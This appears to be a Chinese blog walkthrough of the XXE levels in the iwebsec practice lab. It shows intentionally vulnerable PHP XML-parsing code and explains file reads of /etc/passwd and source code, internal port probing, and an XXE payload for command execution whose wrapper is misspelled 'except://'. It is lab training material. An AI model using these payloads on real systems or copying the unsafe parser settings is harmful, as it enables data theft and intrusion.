iwebsec靶场 XXE关卡通关笔记

已于 2022-11-04 09:58:14 修改
阅读量1.6k 收藏 8
点赞数 1
分类专栏: iwebsec靶场 文章标签: php XXE iwebsec靶场
于 2022-11-04 00:12:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/127678778
版权

 iwebsec靶场xxe关卡通关笔记     

XML外部实体注入简称XXE漏洞。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义,文档元素。

内部声明是直接在XML文件内部声明的,对于安全人员来说基本没用。

外部声明是引用XML以外的文件,有风险。

外部实体注入可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等等。

第一关

如下所示,通关docker查看xxe目录下的index.php源码,内容如下

<?php
  require_once('../header.php');
  ?>
<html>
	<head>
		<title>XXE漏洞</title>
	</head>
	<h2>XXE漏洞</h2>
		<div class="alert alert-success">
			<p>input xml</p>
		</div>
	<body>
  <?php
libxml_disable_entity_loader (false);

$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
if($xmlfile){
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);
	$username = $creds->username;
	$password = $creds->password;
}
	else{
		exit();
	}
?>
		<table class='table table-striped'>
		<?php
		echo 'hello ' . $username;		
		echo "</table>";  
?>

在以上代码中,file_get_contents函数读取php://input传入的参数,但是参数没有经过过滤直接就被loadxml函数中调用并且输出了username值,从而导致XXE漏洞的产生。

由于使用php://input协议传入,故而参数可通过post传递。

基于此利用file://伪协议读取本地文件来加载外部实体(entity),而代码中涉及到变量username和password需要定义在xml参数中,我们在xml中使用element元素声明,如下所示

<!ELEMENT username ANY>
<!ELEMENT password ANY>

 由于username最后输出,故而而我们想获取的实体变量使用entiey来加载

(1)获取敏感信息(密码文件)

如果我们想获取/etc/passwd文件,最后post的参数如下所示

效果如下所示

 使用post参数将xml传入后,可以获取到系统的/etc/passwd文件

(2)获取根目录源码文件

如果我们想获取当前网站根目录下index.php的源码文件,传入参数如下所示

 我们可以获取到index.php在base64编码后的内容,效果如下

使用base64解码进行解码

效果如下所示

<!DOCTYPE html>
<html>
  <head>
	<meta http-equiv="Content-Type" content="text/html;  charset=UTF-8"/>
    <title>iwebsec 靶场漏洞库</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="iwebsec">
	
    <!-- Le styles -->
    <link href="./css/bootstrap.css" rel="stylesheet">

    <style type="text/css">
      body {
        padding-top: 60px;
        padding-bottom: 40px;
      }
    </style>
    <link href="./css/bootstrap-responsive.css" rel="stylesheet">

  </head>

  <body>

    <div class="navbar navbar-inverse navbar-fixed-top">
      <div class="navbar-inner">
        <div class="container">
          <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </a>
          <a class="brand" href="http://www.iwebsec.com">iwebsec.com</a>
          <div class="nav-collapse collapse">
            <ul class="nav">
              <li class="active"><a href="/">首页</a></li>
            </ul>
          </div><!--/.nav-collapse -->
        </div>
      </div>
    </div>

    <div class="container">


<div class="hero-unit">
        <h1>iwebsec</h1>
		<p>此网站中集合了SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的web漏洞环境</p>
<a href="http://iwebsec.com" class="twitter-follow-button" data-show-count="true"  data-size="large">Follow @iwebsec</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
      </div>

	  <script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?8d47cbee4e5b4661d33f3edc68a1c7f0";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


      <!-- Main hero unit for a primary marketing message or call to action -->


      <!-- Example row of columns -->
      <div class="row">
	  
		<div class="span4">
          <h2>SQL注入漏洞</h2>
            <ul>
            	<li><a href="sqli/01.php?id=1">01-数字型注入</a></li>
            	<li><a href="sqli/02.php?id=1">02-字符型注入</a></li>
            	<li><a href="sqli/03.php?id=1">03-bool注入</a></li>
            	<li><a href="sqli/04.php?id=1">04-sleep注入</a></li>
            	<li><a href="sqli/05.php?id=1">05-updatexml注入</a></li>
            	<li><a href="sqli/06.php?id=1">06-宽字节注入</a></li>
            	<li><a href="sqli/07.php?id=1">07-空格过滤绕过</a></li>
            	<li><a href="sqli/08.php?id=1">08-大小写过滤绕过</a></li>
            	<li><a href="sqli/09.php?id=1">09-双写关键字绕过</a></li>
				<li><a href="sqli/10.php?id=1">10-双重url编码绕过</a></li>
				<li><a href="sqli/11.php?id=1">11-十六进制绕过</a></li>
				<li><a href="sqli/12.php?id=1">12-等价函数替换过滤绕过</a></li>
				<li><a href="sqli/13/index.php?id=1">13-二次注入</a></li>
	          </ul>	
       </div>
	   
	   <div class="span4">
          <h2>文件上传漏洞</h2>
          <ul>
          	<li><a href="upload/01.php">01-前端JS过滤绕过</a></li>
			<li><a href="upload/02.php">02-文件名过滤绕过</a></li>
			<li><a href="upload/03.php">03-Content-Type过滤绕过</a></li>
			<li><a href="upload/04.php">04-文件头过滤绕过</a></li>
			<li><a href="upload/05.php">05-.htaccess文件上传</a></li>
			<li><a href="upload/06.php">06-文件截断上传</a></li>
			<li><a href="upload/07.php">07-竞争条件文件上传</a></li>
          </ul>
       </div>
	   
	    <div class="span4">
          <h2>文件包含漏洞</h2>

          <ul>
          	<li><a href="fi/01.php">01-本地文件包含</a></li>
          	<li><a href="fi/02.php">02-本地文件包含绕过</a></li>
			<li><a href="fi/03.php">03-session本地文件包含</a></li>
			<li><a href="fi/04.php">04-远程文件包含</a></li>
			<li><a href="fi/05.php">05-远程文件包含绕过</a></li>
			<li><a href="fi/06.php">06-php://filter伪协议</a></li>
			<li><a href="fi/07.php">07-php://input伪协议</a></li>
			<li><a href="fi/08.php">08-php://input伪协议利用</a></li>
			<li><a href="fi/09.php">09-file://伪协议利用</a></li>
			<li><a href="fi/10.php">10-data://伪协议利用</a></li>
          </ul>

        </div>
	  


      </div>


      <div class="row">
	  
	    <div class="span4">
          <h2>命令执行漏洞</h2>
          <ul>
	          <li><a href="exec/01.php">01-命令执行漏洞</a></li>
	          <li><a href="exec/02.php">02-命令执行漏洞空格绕过</a></li>
			  <li><a href="exec/03.php">03-命令执行漏洞关键命令绕过</a></li>
			  <li><a href="exec/04.php">04-命令执行漏洞通配符绕过</a></li>
			  <li><a href="exec/05.php">05-命令执行漏洞base64编码绕过</a></li>
          </ul>
        </div>
	  
        <div class="span4">
          <h2>代码执行漏洞</h2>
          <ul>
          	<li><a href="execcode/01.php">01-eval函数示例</a></li>
          	<li><a href="execcode/02.php">02-assert函数示例</a></li>
			<li><a href="execcode/03.php">03-call_user_func函数示例</a></li>
			<li><a href="execcode/04.php">04-call_user_func_array函数示例</a></li>
			<li><a href="execcode/05.php">05-create_function函数示例</a></li>
			<li><a href="execcode/06.php">06-array_map函数示例</a></li>
			<li><a href="execcode/07.php">07-preg_replace无漏洞函数示例</a></li>
			<li><a href="execcode/08.php">08-preg_replace漏洞函数示例</a></li>
			<li><a href="execcode/09.php">09-可变函数漏洞示例01</a></li>
			<li><a href="execcode/10.php">10-可变函数漏洞示例02</a></li>
          </ul>
       </div>
	   
	   	<div class="span4">
          <h2>XSS 漏洞</h2>
          <ul>
	          <li><a href="xss/01.php">01-反射型XSS漏洞</a></li>
	          <li><a href="xss/02.php">02-存储型XSS漏洞</a></li>
			  <li><a href="xss/03.php">03-DOM XSS漏洞</a></li>
			  <li><a href="xss/04.php">04-XSS修复示例</a></li>
          </ul>
        </div>
      </div>

      <div class="row">
	  
        <div class="span4">
          <h2>SSRF漏洞</h2>

          <ul>
			  <li><a href="ssrf/index.php">01-SSRF漏洞文件读取</a></li>
			  <li><a href="ssrf/index.php">02-SSRF漏洞内网探测</a></li>
			  <li><a href="ssrf/index.php">03-SSRF漏洞内网应用攻击</a></li>
          </ul>

        </div>

        <div class="span4">
          <h2>XXE漏洞</h2>
          <ul>
	          <li><a href="xxe/index.php">01-XXE漏洞文件读取</a></li>
	          <li><a href="xxe/index.php">02-XXE漏洞内网探测</a></li>
			  <li><a href="xxe/index.php">03-XXE漏洞内网应用攻击</a></li>

          </ul>
        </div>
		
		<div class="span4">
          <h2>反序列化漏洞</h2>
          <ul>
	          <li><a href="unserialize/01/index.php">01-反序列化漏洞示例01</a></li>
			  <li><a href="unserialize/02/index.php">02-反序列化漏洞示例02</a></li>
          </ul>
        </div>
      </div>
	        <div class="row">
	  
        <div class="span4">
          <h2>中间件漏洞</h2>

          <ul>
			  <li><a href="middleware/01.php">01-Weblogic中间件漏洞</a></li>
			  <li><a href="middleware/02.php">02-Tomcat中间件漏洞</a></li>
			  <li><a href="middleware/03.php">03-Jboss中间件漏洞</a></li>
          </ul>

        </div>

        <div class="span4">
          <h2>解析漏洞</h2>
          <ul>
	          <li><a href="parse/01.php">01-Apache解析漏洞</a></li>
	          <li><a href="parse/02.php">02-Nginx解析漏洞</a></li>
          </ul>
        </div>
		
		<div class="span4">
          <h2>数据库漏洞</h2>
          <ul>
	          <li><a href="database/01.php">01-MySQL数据库漏洞</a></li>
			  <li><a href="database/02.php">02-Redis数据库漏洞</a></li>
          </ul>
        </div>
		</div>
<!DOCTYPE html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <footer>
            <b>Copyright(C)2017-2019 <a href="http://www.iwebsec.com" class="hui12" target="_blank">iwebsec 网络安全知识库</a>  All Rights Reserved</b>
        </footer>

</html>

 (3)获取当前xxe目录源码文件

post参数为

访问后如下所示

然后通过base64解码即可查看到源文件。

第二关

利用XXE漏洞进行内网探测,如果端口开启那么请求会很快返回,如果端口关闭那么请求会非常慢。

(1)探测22端口是否开启

payload如下所示

如下所示

我们登录到容器中,通过netstat -ano|grep 22也确认确实打开了22端口

(2)探测23端口是否开启

接下来使用一个不存在服务的端口号23来尝试,如下所示通过 netstat -ano|grep 23可以确认这个端口处于关闭状态

payload如下所示

效果如下所示,提示拒绝连接

 第三关

内网应用攻击,这里可以用PHP expect模块被加载到了易受攻击的系统或处理XML的内部应用程序上,就可以执行如下的命令:

<!DOCTYPE creds [
   <!ELEMENT username ANY>
   <!ELEMENT password ANY>
   <!ENTITY xxe SYSTEM "except://id">
]>
<creds>
<username>&xxe;</username>
<password>test</password>
</creds>

利用xxe漏洞可以调用except://伪协议调用系统命令,不过这种需要PHP环境支持except扩展模块被加载,这样就可以利用它执行系统命令了。然而这种情况现在已经比较少见了,更多还是要利用其他漏洞来实现命令或代码执行。

 由于 PHP 的 expect 并不是默认安装扩展,如果安装了这个expect 扩展我们就能直接利用 XXE 进行 RCE

如上所示当前iwebsec服务器的except扩展模块这个可执行漏洞并不存在,故而无法通过此XXE漏洞执行命令。

这里要强调一下,XXE EXCEPT可执行漏洞这种情况很少发生,但极少数情况下攻击者能够通过XXE执行代码,这主要是由于配置不当/开发内部应用导致的。需要黑客足够幸运,并且PHP expect模块被加载到了易受攻击的系统或处理XML的内部应用程序上,那么才可以执行命令。虽然iwebsec靶场提供了xxe漏洞,但是他的环境中并不是一个幸运的环境,故无法使用xxe except漏洞进行渗透。

mooyuan天天
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
自搭XXE靶场通关记录
weixin_55843787的博客
04-19 276
XXE
iwebsec靶场XXE漏洞)
果粒程
03-07 855
iwebsec靶场XXE漏洞)
iwebsec靶场通关sql注入详解
最新发布
m0_51090949的博客
07-12 1118
iwebsec靶场,sql注入通关,详细教程。
iwebsec XXE漏洞
weixin_44135070的博客
01-22 751
使用POST方式提交数据,这里用到火狐的插件hackbar,首先点击load URL,再勾选post data按钮,将构造好的XML恶意代码放入post框内,点击Execute进行post数据。
Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场
网络安全领域___专研者.
04-24 2955
iwebsec 本质上是一个漏洞集成容器,里面集成了大量的漏洞环境.(如:集合了SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的web漏洞环境) Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身.
iwebsec(代码执行)
果粒程
03-04 690
iwebsec(代码执行)
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入
Yasso的博客
02-22 835
一、xxe注入 这道题应该是最简单的任意文件读取 打开是一个输入框 在C盘构造一个flag,别问我为啥,我也不知道。。。 bp抓个包 随便输入个什么都有回显,应该是基础的XXE注入 这是一段读取文件的xml<?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY B SYSTEM "file:///c:/1.txt"> ]> <xml> <xxe>&B;</xxe&g...
iwebsec靶场搭建
07-28
iwebsec靶场是一个漏洞集成容器,其中集成了大量的web漏洞环境,包括SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的漏洞环境。\[1\] 要搭建iwebsec靶场,可以使用docker来运行容器。...
哆啦靶场 SSRF、XXE、XSS、XSS学习、SQL部分通关教程
玄道的网安博客
04-26 3445
SSRF漏洞靶场 来到SSRF首页 看看file_get_content.php 这应该就是file_get_content要包含的文件了 假设我们本地搭建一个1.php文件 然后包含这个文件即可 为什么不是php形式的样子,而是html的形式,因为htmlentities函数把包含进来的转换成html实体了 第二关 输入端口445,账号秘密都是r...
XXE的搭建和通关
h0ld1rs的博客
09-04 1447
文章目录搭建通关 php_xxeXML声明XML DTD防御办法 搭建 经过半天的搜寻后,发现,使用docker搭建的情况不是很如愿,于是找到了xxe-labs的包,再本地使用phpstudy进行搭建 通关 php_xxe 题目的样子是这样的,这是我们抓包后的结果 通过审计可以知道是post传入,根据xml的性质,我们直接构造XML声明和DTD部分,引用外部实体去尝试读取c:/windows/win.ini文件 再post参数中修改username,使他指向外部实体,从而利用该漏洞 以下为一些xml的固
iwebsec靶场 命令执行漏洞通关笔记
mooyuan的博客
11-25 3197
iwebsec靶场的命令执行通关笔记,共有五个关卡,分别涉及到基础的命令执行漏洞、空格绕过、关键字绕过、通配符绕过、base64绕过共五方面的渗透。什么是命令执行漏洞?命令执行漏洞是服务器端没有对客户端用户输入的参数进行过滤,导致用户可以通过任意拼接系统命令,使服务器端成功执行任意系统命令。命令执行漏洞主要是服务端没有对执行命令的函数做出过滤导致的,因为在web服务程序有时候去需要调用执行命令的函数,所以如果没有对客户端用户输入的命令进行过滤,可能发生命令执行漏洞。
XSS漏洞 | iwebsec
weixin_52116519的博客
02-07 1202
攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入帖子的内容中。客户端的脚本程序可以通过DOM动态修改页面内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOM型XSS漏洞不需要与服务器交互,它只发生在客户端处理数据阶段。这个跟反射型XSS很像,但是机制是不一样的,这里不需要用到后端,也就是不涉及php代码。将输入的东西提交后,展示在页面中,并且展示所有输入提交过的,这种就是存储型XSS了。是以前搭建好的,测了文件上传和一些SQL注入,现在好久没用了,重新启动。
Web安全之XXE漏洞
xlsj雪松的博客
01-26 655
1 定义 XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 2 XML XML是一个格式和HTML很像的标记语言,用来存储数据;XML是一个纯文本,标签都是自己定义的。 XML文件的格式: 实体写在DTD部分,XML部分是真正的存储数据的地方。DTD有两种声明方式: 1、内部 dtd:即对 XML 文档中的元素、属性和实体的 DTD 的声明都在 XML 文档中。 2、外部 dtd:即对 XML 文
WEB常见漏洞之XXE靶场篇)_220 vmware authentication daemon version 1(2)
2401_84166965的博客
04-15 608
其实在我们攻击具有XXE漏洞的服务器时,受攻击服务器进行了两次响应,如果查看受攻击的服务器上的日志会发现两条记录:一次是对XML进行解析后对另一台远程服务器的访问,一次是访问服务器自身上具有XXE漏洞的文件。基于此,在实战中我们面对盲注时,构造xml内容让其访问我们能够控制的主机,然后查看我们能够控制的主机上是否具有来自受攻击机的访问记录就可确定是否有XML注入。可以看到确实收到了受攻击机的访问记录,说明受攻击机解析了XML内容,来访问了我们的公网ip主机(假设是公网ip主机)
iwebsec靶场 中间件漏洞通关笔记2-Tomcat中间件漏洞
mooyuan的博客
01-03 1367
Tomcat配置文件conf/web.xml 文件,当 readonly 设置为 false 时,可以允许 PUT、DELETE 方法,上传或删除文件,通过上传的JSP文件可以在服务器上执行任意代码。tomcat6/7/8+会针对登陆次数过多的用户进行锁定,经过统计分析,当登录错误>5次后,就会锁定用户,所以要注意这个问题,如果已经锁定了账号需要重启服务。由于靶场环境搭建在linux系统中,故而需要使用/方法进行渗透,构造的ljn.jsp内容为。构造协议,路径中输入ljn.jsp然后点击执行后,bp抓包。
web安全101之如何理解XXE
HBohan的博客
10-28 678
前置知识 XXE如何理解? 它是可扩展标记语言 ( XML) 用于存储和传输数据。 通常始于异步JavaScript和XML技术(ajax技术):网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面。 目前JSON的使用比XML更加普遍。JSON和XML都被用于在Ajax模型中的XML技术。 这种标记语言允许开发人员定义和表示任意数据结构的HTML。 以下为定义属性和值的Security Assertion Markup Language(SAML)语言 <saml:Attrib
【网络安全】XXE漏洞详细解析
你在看屏幕的同时,屏幕也在注视着你
09-30 2033
XXE漏洞详细解析
iwebsec靶场(XSS)
果粒程
03-05 705
iwebsec靶场(XSS)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值